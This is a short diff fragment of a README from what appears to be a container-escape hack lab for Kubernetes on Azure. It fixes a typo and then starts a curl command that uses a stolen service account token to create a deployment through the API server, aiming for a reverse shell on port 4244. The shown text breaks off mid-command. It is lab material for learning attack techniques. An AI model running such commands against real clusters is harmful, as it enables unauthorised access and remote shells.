mondoohq/samples/hack-lab/container-escape/azure/README.md

 no
 ```

-So, here wo donot have enough permissions and a result we cannot create a new pod from within this pod by calling the API.
+So, here we don't have enough permissions and a result we cannot create a new pod from within this pod by calling the API.
 If we had enough permissions by getting simply 'yes' from above query, we could use following to create a pod and at the same listening on the port 4244 to get a reverse shell:

 ```bash
 curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X POST ${APISERVER}/apis/apps/v1/namespaces/default/deployments -H 'Content-Type: application/yaml' -d '---